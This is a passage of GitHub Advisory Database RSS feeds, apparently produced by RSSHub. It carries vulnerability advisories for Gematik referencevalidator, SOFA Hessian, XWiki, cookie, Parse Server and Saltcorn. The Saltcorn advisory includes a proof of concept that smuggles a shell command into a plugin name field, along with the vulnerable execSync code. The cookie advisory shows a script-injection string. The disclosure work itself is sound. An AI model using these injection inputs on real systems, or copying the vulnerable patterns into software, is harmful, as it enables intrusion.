<guid isPermaLink="false">https://github.com/advisories/GHSA-735f-pc8j-v9w8</guid>
<pubDate>Thu, 19 Sep 2024 16:06:03 GMT</pubDate>
</item>
<item>
<title>Gematik Referenzvalidator has an XXE vulnerability that can lead to a Server Side Request Forgery attack</title>
<description><h3>Impact</h3>
<p>The profile location routine in the referencevalidator commons package is vulnerable to <a href="https://owasp.org/www-project-top-ten/2017/A4_2017-XML_External_Entities_(XXE)" rel="nofollow">XML External Entities</a> attack due to insecure defaults of the used Woodstox WstxInputFactory. A malicious XML resource can lead to network requests issued by referencevalidator and thus to a <a href="https://owasp.org/www-community/attacks/Server_Side_Request_Forgery" rel="nofollow">Server Side Request Forgery</a> attack.</p>
<p>The vulnerability impacts applications which use referencevalidator to process XML resources from untrusted sources.</p>
<h3>Patches</h3>
<p>The problem has been patched with the <a href="https://github.com/gematik/app-referencevalidator/releases/tag/2.5.1">2.5.1 version</a> of the referencevalidator. Users are strongly recommended to update to this version or a more recent one.</p>
<h3>Workarounds</h3>
<p>Pre-processing or manual analysis of input XML resources for the existence of DTD definitions or external entities can mitigate the problem.</p>
<h3>References</h3>
<ul>
<li><a href="https://owasp.org/www-project-top-ten/2017/A4_2017-XML_External_Entities_(XXE)#" rel="nofollow">OWASP Top 10 XXE</a></li>
<li><a href="https://owasp.org/www-community/attacks/Server_Side_Request_Forgery" rel="nofollow">Server Side Request Forgery</a></li>
<li><a href="https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#transformerfactory" rel="nofollow">OWASP XML External Entity Prevention Cheat Sheet</a></li>
</ul>
<h3>References</h3>
<ul>
<li><a title="GHSA-68j8-fp38-p48q" href="https://github.com/gematik/app-referencevalidator/security/advisories/GHSA-68j8-fp38-p48q">GHSA-68j8-fp38-p48q</a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/gematik/app-referencevalidator/commit/d6d27613fab7a8dd08534946f29e0c51f319cad6/hovercard" href="https://github.com/gematik/app-referencevalidator/commit/d6d27613fab7a8dd08534946f29e0c51f319cad6">gematik/app-referencevalidator@<tt>d6d2761</tt></a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-46984" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-46984</a></li>
<li><a href="https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#transformerfactory" rel="nofollow">https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#transformerfactory</a></li>
<li><a href="https://github.com/gematik/app-referencevalidator/releases/tag/2.5.1">https://github.com/gematik/app-referencevalidator/releases/tag/2.5.1</a></li>
<li><a href="https://owasp.org/www-community/attacks/Server_Side_Request_Forgery" rel="nofollow">https://owasp.org/www-community/attacks/Server_Side_Request_Forgery</a></li>
<li><a href="https://owasp.org/www-project-top-ten/2017/A4_2017-XML_External_Entities_(XXE)" rel="nofollow">https://owasp.org/www-project-top-ten/2017/A4_2017-XML_External_Entities_(XXE)</a></li>
<li><a href="https://owasp.org/www-project-top-ten/2017/A4_2017-XML_External_Entities_(XXE)#" rel="nofollow">https://owasp.org/www-project-top-ten/2017/A4_2017-XML_External_Entities_(XXE)#</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-68j8-fp38-p48q</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-68j8-fp38-p48q</guid>
<pubDate>Thu, 19 Sep 2024 14:49:40 GMT</pubDate>
</item>
<item>
<title>SOFA Hessian Remote Command Execution (RCE) Vulnerability</title>
<description><h3>Impact</h3>
<p>SOFA Hessian protocol uses a blacklist mechanism to restrict deserialization of potentially dangerous classes for security protection. But there is a gadget chain that can bypass the SOFA Hessian blacklist protection mechanism, and this gadget chain only relies on JDK and does not rely on any third-party components.</p>
<h3>Patches</h3>
<p>Fixed this issue by updating the blacklist; users can upgrade to sofahessian version 3.5.5 to avoid this issue.</p>
<h3>Workarounds</h3>
<p>You can maintain a blacklist yourself in this directory <code class="notranslate">external/serialize.blacklist</code>.</p>
<h3>References</h3>
<ul>
<li><a title="GHSA-c459-2m73-67hj" href="https://github.com/sofastack/sofa-hessian/security/advisories/GHSA-c459-2m73-67hj">GHSA-c459-2m73-67hj</a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/sofastack/sofa-hessian/commit/764ef4b216aee6aeb4b111aec8947a4e8b53bb87/hovercard" href="https://github.com/sofastack/sofa-hessian/commit/764ef4b216aee6aeb4b111aec8947a4e8b53bb87">sofastack/sofa-hessian@<tt>764ef4b</tt></a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-46983" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-46983</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-c459-2m73-67hj</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-c459-2m73-67hj</guid>
<pubDate>Thu, 19 Sep 2024 14:49:20 GMT</pubDate>
</item>
<item>
<title>org.xwiki.platform:xwiki-platform-notifications-ui leaks data of notification filters of users</title>
<description><h3>Impact</h3>
<p>It's possible to get access to notification filters of any user by using a URL such as <code class="notranslate">&lt;hostname&gt;xwiki/bin/get/XWiki/Notifications/Code/NotificationFilterPreferenceLivetableResults?outputSyntax=plain&amp;type=custom&amp;user=&lt;username&gt;</code>. This vulnerability impacts all versions of XWiki since 13.2-rc-1.<br>
The filters do not provide much information (they mainly contain references which are public data in XWiki), though some info could be used in combination with other vulnerabilities.</p>
<h3>Patches</h3>
<p>The vulnerability has been patched in XWiki 14.10.21, 15.5.5, 15.10.1, 16.0RC1.<br>
The patch consists in checking the rights of the user when sending the data.</p>
<h3>Workarounds</h3>
<p>It's possible to work around the vulnerability by applying the patch manually: an administrator can directly edit the document <code class="notranslate">XWiki.Notifications.Code.NotificationFilterPreferenceLivetableResults</code> to apply the same changes as in the patch. See c8c6545f9bde6f5aade994aa5b5903a67b5c2582.</p>
<h3>References</h3>
<ul>
<li>Jira ticket: <a href="https://jira.xwiki.org/browse/XWIKI-20336" rel="nofollow">https://jira.xwiki.org/browse/XWIKI-20336</a></li>
<li>Commit: c8c6545f9bde6f5aade994aa5b5903a67b5c2582</li>
</ul>
<h3>For more information</h3>
<p>If you have any questions or comments about this advisory:</p>
<ul>
<li>Open an issue in <a href="https://jira.xwiki.org/" rel="nofollow">Jira XWiki.org</a></li>
<li>Email us at <a href="mailto:security@xwiki.org">Security Mailing List</a></li>
</ul>
<h3>Attribution</h3>
<p>This vulnerability has been reported on Intigriti by <a href="https://www.linkedin.com/in/metehan-kalkan-5a3201199" rel="nofollow">Mete</a>.</p>
<h3>References</h3>
<ul>
<li><a title="GHSA-pg4m-3gp6-hw4w" href="https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-pg4m-3gp6-hw4w">GHSA-pg4m-3gp6-hw4w</a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/xwiki/xwiki-platform/commit/29e5edbb2b7068ada17290cea41e0aa8144e1294/hovercard" href="https://github.com/xwiki/xwiki-platform/commit/29e5edbb2b7068ada17290cea41e0aa8144e1294">xwiki/xwiki-platform@<tt>29e5edb</tt></a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/xwiki/xwiki-platform/commit/a0352922a1a61e0e858a9be89d73f0665630a63a/hovercard" href="https://github.com/xwiki/xwiki-platform/commit/a0352922a1a61e0e858a9be89d73f0665630a63a">xwiki/xwiki-platform@<tt>a035292</tt></a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/xwiki/xwiki-platform/commit/c8c6545f9bde6f5aade994aa5b5903a67b5c2582/hovercard" href="https://github.com/xwiki/xwiki-platform/commit/c8c6545f9bde6f5aade994aa5b5903a67b5c2582">xwiki/xwiki-platform@<tt>c8c6545</tt></a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/xwiki/xwiki-platform/commit/ed090d1aa228848d3860968c437b72db3b09119f/hovercard" href="https://github.com/xwiki/xwiki-platform/commit/ed090d1aa228848d3860968c437b72db3b09119f">xwiki/xwiki-platform@<tt>ed090d1</tt></a></li>
<li><a href="https://jira.xwiki.org/browse/XWIKI-20336" rel="nofollow">https://jira.xwiki.org/browse/XWIKI-20336</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-46979" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-46979</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-pg4m-3gp6-hw4w</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-pg4m-3gp6-hw4w</guid>
<pubDate>Wed, 18 Sep 2024 14:26:20 GMT</pubDate>
</item>
<item>
<title>org.xwiki.platform:xwiki-platform-notifications-ui is missing checks for notification filter preferences editions</title>
<description><h3>Impact</h3>
<p>It's possible for any user knowing the ID of a notification filter preference of another user to enable/disable it or even delete it. The impact is that the target user might start losing notifications on some pages because of this.<br>
This vulnerability is present in XWiki since 13.2-rc-1.</p>
<h3>Patches</h3>
<p>The vulnerability has been patched in XWiki 14.10.21, 15.5.5, 15.10.1, 16.0-rc-1. The patch consists of properly checking the rights of the user before performing any action on the filters.</p>
<h3>Workarounds</h3>
<p>It's possible to fix the vulnerability manually by editing the document <code class="notranslate">XWiki.Notifications.Code.NotificationPreferenceService</code> to apply the changes performed in commit e8acc9d8e6af7dfbfe70716ded431642ae4a6dd4.</p>
<h3>References</h3>
<ul>
<li>JIRA ticket: <a href="https://jira.xwiki.org/browse/XWIKI-20337" rel="nofollow">https://jira.xwiki.org/browse/XWIKI-20337</a></li>
<li>Commit: e8acc9d8e6af7dfbfe70716ded431642ae4a6dd4</li>
</ul>
<h3>For more information</h3>
<p>If you have any questions or comments about this advisory:</p>
<ul>
<li>Open an issue in <a href="https://jira.xwiki.org/" rel="nofollow">Jira XWiki.org</a></li>
<li>Email us at <a href="mailto:security@xwiki.org">Security Mailing List</a></li>
</ul>
<h3>Attribution</h3>
<p>This vulnerability has been reported on Intigriti by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/floerer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/floerer">@floerer</a></p>
<h3>References</h3>
<ul>
<li><a title="GHSA-r95w-889q-x2gx" href="https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-r95w-889q-x2gx">GHSA-r95w-889q-x2gx</a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/xwiki/xwiki-platform/commit/4771573dac88e0cf04e30f1a8dfa183c048d503a/hovercard" href="https://github.com/xwiki/xwiki-platform/commit/4771573dac88e0cf04e30f1a8dfa183c048d503a">xwiki/xwiki-platform@<tt>4771573</tt></a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/xwiki/xwiki-platform/commit/99193a7e9a203b5bb8b2583ac96f5f4d56b9aa1a/hovercard" href="https://github.com/xwiki/xwiki-platform/commit/99193a7e9a203b5bb8b2583ac96f5f4d56b9aa1a">xwiki/xwiki-platform@<tt>99193a7</tt></a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/xwiki/xwiki-platform/commit/b9180b874a22e383ad5f2cd9e25bfed4594d4955/hovercard" href="https://github.com/xwiki/xwiki-platform/commit/b9180b874a22e383ad5f2cd9e25bfed4594d4955">xwiki/xwiki-platform@<tt>b9180b8</tt></a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/xwiki/xwiki-platform/commit/e8acc9d8e6af7dfbfe70716ded431642ae4a6dd4/hovercard" href="https://github.com/xwiki/xwiki-platform/commit/e8acc9d8e6af7dfbfe70716ded431642ae4a6dd4">xwiki/xwiki-platform@<tt>e8acc9d</tt></a></li>
<li><a href="https://jira.xwiki.org/browse/XWIKI-20337" rel="nofollow">https://jira.xwiki.org/browse/XWIKI-20337</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-46978" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-46978</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-r95w-889q-x2gx</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-r95w-889q-x2gx</guid>
<pubDate>Wed, 18 Sep 2024 14:26:16 GMT</pubDate>
</item>
<item>
<title>Keycloak Services has a potential bypass of brute force protection</title>
... |
http://localhost:1200/github/advisor/data/reviewed/npm - Success ✔️<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" version="2.0">
<channel>
<title>GitHub Advisory Database RSS - npm - reviewed</title>
<link>https://github.com/advisories</link>
<atom:link href="http://localhost:1200/github/advisor/data/reviewed/npm" rel="self" type="application/rss+xml"></atom:link>
<description>GitHub Advisory Database RSS - npm - reviewed - Powered by RSSHub</description>
<generator>RSSHub</generator>
<webMaster>contact@rsshub.app (RSSHub)</webMaster>
<language>en</language>
<lastBuildDate>Sat, 05 Oct 2024 18:31:10 GMT</lastBuildDate>
<ttl>5</ttl>
<item>
<title>cookie accepts cookie name, path, and domain with out of bounds characters</title>
<description><h3>Impact</h3>
<p>The cookie name could be used to set other fields of the cookie, resulting in an unexpected cookie value. For example, <code class="notranslate">serialize("userName=&lt;script&gt;alert('XSS3')&lt;/script&gt;; Max-Age=2592000; a", value)</code> would result in <code class="notranslate">"userName=&lt;script&gt;alert('XSS3')&lt;/script&gt;; Max-Age=2592000; a=test"</code>, setting <code class="notranslate">userName</code> cookie to <code class="notranslate">&lt;script&gt;</code> and ignoring <code class="notranslate">value</code>.</p>
<p>A similar escape can be used for <code class="notranslate">path</code> and <code class="notranslate">domain</code>, which could be abused to alter other fields of the cookie.</p>
<h3>Patches</h3>
<p>Upgrade to 0.7.0, which updates the validation for <code class="notranslate">name</code>, <code class="notranslate">path</code>, and <code class="notranslate">domain</code>.</p>
<h3>Workarounds</h3>
<p>Avoid passing untrusted or arbitrary values for these fields; ensure they are set by the application instead of user input.</p>
<h3>References</h3>
<ul>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2414371453" data-permission-text="Title is private" data-url="https://github.com/jshttp/cookie/issues/167" data-hovercard-type="pull_request" data-hovercard-url="/jshttp/cookie/pull/167/hovercard" href="https://github.com/jshttp/cookie/pull/167">jshttp/cookie#167</a></li>
</ul>
<h3>References</h3>
<ul>
<li><a title="GHSA-pxg6-pf52-xh8x" href="https://github.com/jshttp/cookie/security/advisories/GHSA-pxg6-pf52-xh8x">GHSA-pxg6-pf52-xh8x</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2414371453" data-permission-text="Title is private" data-url="https://github.com/jshttp/cookie/issues/167" data-hovercard-type="pull_request" data-hovercard-url="/jshttp/cookie/pull/167/hovercard" href="https://github.com/jshttp/cookie/pull/167">jshttp/cookie#167</a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/jshttp/cookie/commit/e10042845354fea83bd8f34af72475eed1dadf5c/hovercard" href="https://github.com/jshttp/cookie/commit/e10042845354fea83bd8f34af72475eed1dadf5c">jshttp/cookie@<tt>e100428</tt></a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-pxg6-pf52-xh8x</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-pxg6-pf52-xh8x</guid>
<pubDate>Fri, 04 Oct 2024 20:31:00 GMT</pubDate>
</item>
<item>
<title>Parse Server's custom object ID allows to acquire role privileges</title>
<description><h3>Impact</h3>
<p>If the Parse Server option <code class="notranslate">allowCustomObjectId: true</code> is set, an attacker that is allowed to create a new user can set a custom object ID for that new user that exploits the vulnerability and acquires privileges of a specific role.</p>
<h3>Patches</h3>
<p>Improved validation for custom user object IDs. Session tokens for existing users with an object ID that exploits the vulnerability are now rejected.</p>
<h3>Workarounds</h3>
<ul>
<li>Disable custom object IDs by setting <code class="notranslate">allowCustomObjectId: false</code> or not setting the option which defaults to <code class="notranslate">false</code>.</li>
<li>Use a Cloud Code Trigger to validate that a new user's object ID doesn't start with the prefix <code class="notranslate">role:</code>.</li>
</ul>
<h3>References</h3>
<ul>
<li><a title="GHSA-8xq9-g7ch-35hg" href="https://github.com/parse-community/parse-server/security/advisories/GHSA-8xq9-g7ch-35hg">GHSA-8xq9-g7ch-35hg</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2564579124" data-permission-text="Title is private" data-url="https://github.com/parse-community/parse-server/issues/9317" data-hovercard-type="pull_request" data-hovercard-url="/parse-community/parse-server/pull/9317/hovercard" href="https://github.com/parse-community/parse-server/pull/9317">parse-community/parse-server#9317</a> (fix for Parse Server 7)</li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2564597127" data-permission-text="Title is private" data-url="https://github.com/parse-community/parse-server/issues/9318" data-hovercard-type="pull_request" data-hovercard-url="/parse-community/parse-server/pull/9318/hovercard" href="https://github.com/parse-community/parse-server/pull/9318">parse-community/parse-server#9318</a> (fix for Parse Server 6)</li>
</ul>
<h3>References</h3>
<ul>
<li><a title="GHSA-8xq9-g7ch-35hg" href="https://github.com/parse-community/parse-server/security/advisories/GHSA-8xq9-g7ch-35hg">GHSA-8xq9-g7ch-35hg</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-47183" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-47183</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2564579124" data-permission-text="Title is private" data-url="https://github.com/parse-community/parse-server/issues/9317" data-hovercard-type="pull_request" data-hovercard-url="/parse-community/parse-server/pull/9317/hovercard" href="https://github.com/parse-community/parse-server/pull/9317">parse-community/parse-server#9317</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2564597127" data-permission-text="Title is private" data-url="https://github.com/parse-community/parse-server/issues/9318" data-hovercard-type="pull_request" data-hovercard-url="/parse-community/parse-server/pull/9318/hovercard" href="https://github.com/parse-community/parse-server/pull/9318">parse-community/parse-server#9318</a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/parse-community/parse-server/commit/13ee52f0d19ef3a3524b3d79aea100e587eb3cfc/hovercard" href="https://github.com/parse-community/parse-server/commit/13ee52f0d19ef3a3524b3d79aea100e587eb3cfc">parse-community/parse-server@<tt>13ee52f</tt></a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/parse-community/parse-server/commit/1bfbccf9ee7ea77533b2b2aa7c4c69f3bd35e66f/hovercard" href="https://github.com/parse-community/parse-server/commit/1bfbccf9ee7ea77533b2b2aa7c4c69f3bd35e66f">parse-community/parse-server@<tt>1bfbccf</tt></a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-8xq9-g7ch-35hg</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-8xq9-g7ch-35hg</guid>
<pubDate>Fri, 04 Oct 2024 18:50:56 GMT</pubDate>
</item>
<item>
<title>@saltcorn/plugins-loader unsanitized plugin name leads to a remote code execution (RCE) vulnerability when creating plugins using git source</title>
<description><h3>Summary</h3>
<p>When creating a new plugin using the <code class="notranslate">git</code> source, the user-controlled value <code class="notranslate">req.body.name</code> is used to build the plugin directory where the location will be cloned. The API used to execute the <code class="notranslate">git clone</code> command with the user-controlled data is <code class="notranslate">child_process.execSync</code>. Since the user-controlled data is not validated, a user with admin permission can add escaping characters and execute arbitrary commands, leading to a command injection vulnerability.</p>
<h3>Details</h3>
<p>Relevant code from source (<code class="notranslate">req.body</code>) to sink (<code class="notranslate">child_process.execSync</code>).</p>
<ul>
<li>file: <a href="https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/server/routes/plugins.js#L1400">https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/server/routes/plugins.js#L1400</a></li>
</ul>
<div class="highlight highlight-source-js"><pre class="notranslate">router.post(
  "/",
  isAdmin,
  error_catcher(async (req, res) =&gt; {
    const plugin = new Plugin(req.body); // [1]
    [...]
    try {
      await load_plugins.loadAndSaveNewPlugin( // [3]
        plugin,
        schema === db.connectObj.default_schema || plugin.source === "github"
      );
      [...]
    }
  })
);</pre></div>
<ul>
<li>file: <a href="https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/saltcorn-data/models/plugin.ts#L44">https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/saltcorn-data/models/plugin.ts#L44</a></li>
</ul>
<div class="highlight highlight-source-js"><pre class="notranslate">class Plugin {
  [...]
  constructor(o: PluginCfg | PluginPack | Plugin) {
    [...]
    this.name = o.name; // [2]
    [...]
  }</pre></div>
<ul>
<li>file: <a href="https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/server/load_plugins.js#L64-L65">https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/server/load_plugins.js#L64-L65</a></li>
</ul>
<div class="highlight highlight-source-js"><pre class="notranslate">const loadAndSaveNewPlugin = async (plugin, force, noSignalOrDB) =&gt; {
  [...]
  const loader = new PluginInstaller(plugin); // [4]
  const res = await loader.install(force); // [7]
  [...]
};</pre></div>
<ul>
<li>file: <a href="https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/plugins-loader/plugin_installer.js#L41-L61">https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/plugins-loader/plugin_installer.js#L41-L61</a></li>
</ul>
<div class="highlight highlight-source-js"><pre class="notranslate">class PluginInstaller {
  constructor(plugin, opts = {}) {
    [...]
    const tokens =
      plugin.source === "npm"
        ? plugin.location.split("/")
        : plugin.name.split("/"); // [5]
    [...]
    this.tempDir = join(this.tempRootFolder, "temp_install", ...tokens); // [6]
    [...]
  }
  async install(force) {
    [...]
    if (await this.prepPluginsFolder(force, pckJSON)) { // [8]
    [...]
  }
  async prepPluginsFolder(force, pckJSON) {
    [...]
    switch (this.plugin.source) {
    [...]
      case "git":
        if (force || !(await pathExists(this.pluginDir))) {
          await gitPullOrClone(this.plugin, this.tempDir); // [9]
    [...]
}</pre></div>
<ul>
<li>file: <a href="https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/plugins-loader/download_utils.js#L112">https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/plugins-loader/download_utils.js#L112</a></li>
</ul>
<div class="highlight highlight-source-js"><pre class="notranslate">const gitPullOrClone = async (plugin, pluginDir) =&gt; {
  [...]
  if (fs.existsSync(pluginDir)) {
    execSync(`git ${setKey} -C ${pluginDir} pull`);
  } else {
    execSync(`git ${setKey} clone ${plugin.location} ${pluginDir}`); // [10]
  }
  [...]
};</pre></div>
<h3>PoC</h3>
<ul>
<li>check that the file that will be created by the command <code class="notranslate">echo "hello"&gt;/tmp/HACKED</code> does not exist:</li>
</ul>
<pre class="notranslate"><code class="notranslate">cat /tmp/HACKED
cat: /tmp/HACKED: No such file or directory
</code></pre>
<ul>
<li>login with an admin account</li>
<li>visit <code class="notranslate">http://localhost:3000/plugins/new</code></li>
<li>enter the following fields:
<ul>
<li>Name: <code class="notranslate">;echo "hello"&gt;/tmp/HACKED</code></li>
<li>Source: <code class="notranslate">git</code></li>
<li>other fields blank</li>
</ul>
</li>
<li>click <code class="notranslate">Create</code></li>
<li>you will get an error saying <code class="notranslate">ENOENT: no such file or directory, ....</code> but the command <code class="notranslate">touch /tmp/HACKED</code> will be executed</li>
<li>to verify:</li>
</ul>
<pre class="notranslate"><code class="notranslate">cat /tmp/HACKED
hello
</code></pre>
<h3>Impact</h3>
<p>Remote code execution</p>
<h3>Recommended Mitigation</h3>
<p>Sanitize the <code class="notranslate">pluginDir</code> value before passing to <code class="notranslate">execSync</code>. Alternatively, use the <code class="notranslate">child_process.execFileSync</code> API (docs: <a href="https://nodejs.org/api/child_process.html#child_processexecfilesyncfile-args-options" rel="nofollow">https://nodejs.org/api/child_process.html#child_processexecfilesyncfile-args-options</a>)</p>
<h3>References</h3>
<ul>
<li><a title="GHSA-fm76-w8jw-xf8m" href="https://github.com/saltcorn/saltcorn/security/advisories/GHSA-fm76-w8jw-xf8m">GHSA-fm76-w8jw-xf8m</a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/saltcorn/saltcorn/commit/024f19a7e079913f62f4a2335ab04116ddb68192/hovercard" href="https://github.com/saltcorn/saltcorn/commit/024f19a7e079913f62f4a2335ab04116ddb68192">saltcorn/saltcorn@<tt>024f19a</tt></a></li>
<li><a href="https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/plugins-loader/download_utils.js#L112">https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/plugins-loader/download_utils.js#L112</a></li>
<li><a href="https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/plugins-loader/plugin_installer.js#L41-L61">https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/plugins-loader/plugin_installer.js#L41-L61</a></li>
<li><a href="https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/saltcorn-data/models/plugin.ts#L44">https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/saltcorn-data/models/plugin.ts#L44</a></li>
<li><a href="https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/server/load_plugins.js#L64-L65">https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/server/load_plugins.js#L64-L65</a></li>
<li><a href="https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/server/routes/plugins.js#L1400">https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/server/routes/plugins.js#L1400</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-fm76-w8jw-xf8m</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-fm76-w8jw-xf8m</guid>
<pubDate>Thu, 03 Oct 2024 22:21:24 GMT</pubDate>
</item>
<item>
<title>@saltcorn/server Remote Code Execution (RCE) / SQL injection via prototype pollution by manipulating `lang` and `defstring` parameters when setting lo...</title>
<description><h3>Summary</h3>
<p>The endpoint <code class="notranslate">/site-structure/localizer/save-string/:lang/:defstring</code> accepts two parameter values: <code class="notranslate">lang</code> and <code class="notranslate">defstring</code>. These values are used in an unsafe way to set the keys and value of the <code class="notranslate">cfgStrings</code> object. It allows adding or modifying properties of the <code class="notranslate">Object prototype</code>, which results in several logic issues, including:</p>
<ul>
<li>RCE vulnerabilities by polluting the <code class="notranslate">tempRootFolder</code> property</li>
<li>SQL injection vulnerabilities by polluting the <code class="notranslate">schema</code> property when using <code class="notranslate">PostgreSQL</code> database.</li>
</ul>
<h3>Details</h3>
<ul>
<li>file: <a href="https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/server/routes/infoarch.js#L236-L239">https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/server/routes/infoarch.js#L236-L239</a></li>
</ul>
<div class="highlight highlight-source-js"><pre class="notranslate"><span class="pl-s1">router</span><span class="pl-kos">.</span><span class="pl-en">post</span><span class="pl-kos">(</span>
<span class="pl-s">"/localizer/save-string/:lang/:defstring"</span><span class="pl-kos">,</span>
<span class="pl-s1">isAdmin</span><span class="pl-kos">,</span>
<span class="pl-en">error_catcher</span><span class="pl-kos">(</span><span class="pl-k">async</span> <span class="pl-kos">(</span><span class="pl-s1">req</span><span class="pl-kos">,</span> <span class="pl-s1">res</span><span class="pl-kos">)</span> <span class="pl-c1">=&gt;</span> <span class="pl-kos">{</span>
<span class="pl-k">const</span> <span class="pl-kos">{</span> lang<span class="pl-kos">,</span> defstring <span class="pl-kos">}</span> <span class="pl-c1">=</span> <span class="pl-s1">req</span><span class="pl-kos">.</span><span class="pl-c1">params</span><span class="pl-kos">;</span> <span class="pl-c">// source</span>
<span class="pl-k">const</span> <span class="pl-s1">cfgStrings</span> <span class="pl-c1">=</span> <span class="pl-en">getState</span><span class="pl-kos">(</span><span class="pl-kos">)</span><span class="pl-kos">.</span><span class="pl-en">getConfigCopy</span><span class="pl-kos">(</span><span class="pl-s">"localizer_strings"</span><span class="pl-kos">)</span><span class="pl-kos">;</span>
<span class="pl-k">if</span> <span class="pl-kos">(</span><span class="pl-s1">cfgStrings</span><span class="pl-kos">[</span><span class="pl-s1">lang</span><span class="pl-kos">]</span><span class="pl-kos">)</span> <span class="pl-s1">cfgStrings</span><span class="pl-kos">[</span><span class="pl-s1">lang</span><span class="pl-kos">]</span><span class="pl-kos">[</span><span class="pl-s1">defstring</span><span class="pl-kos">]</span> <span class="pl-c1">=</span> <span class="pl-en">text</span><span class="pl-kos">(</span><span class="pl-s1">req</span><span class="pl-kos">.</span><span class="pl-c1">body</span><span class="pl-kos">.</span><span class="pl-c1">value</span><span class="pl-kos">)</span><span class="pl-kos">;</span> <span class="pl-c">// [1] sink</span>
<span class="pl-k">else</span> <span class="pl-s1">cfgStrings</span><span class="pl-kos">[</span><span class="pl-s1">lang</span><span class="pl-kos">]</span> <span class="pl-c1">=</span> <span class="pl-kos">{</span> <span class="pl-kos">[</span><span class="pl-s1">defstring</span><span class="pl-kos">]</span>: <span class="pl-en">text</span><span class="pl-kos">(</span><span class="pl-s1">req</span><span class="pl-kos">.</span><span class="pl-c1">body</span><span class="pl-kos">.</span><span class="pl-c1">value</span><span class="pl-kos">)</span> <span class="pl-kos">}</span><span class="pl-kos">;</span>
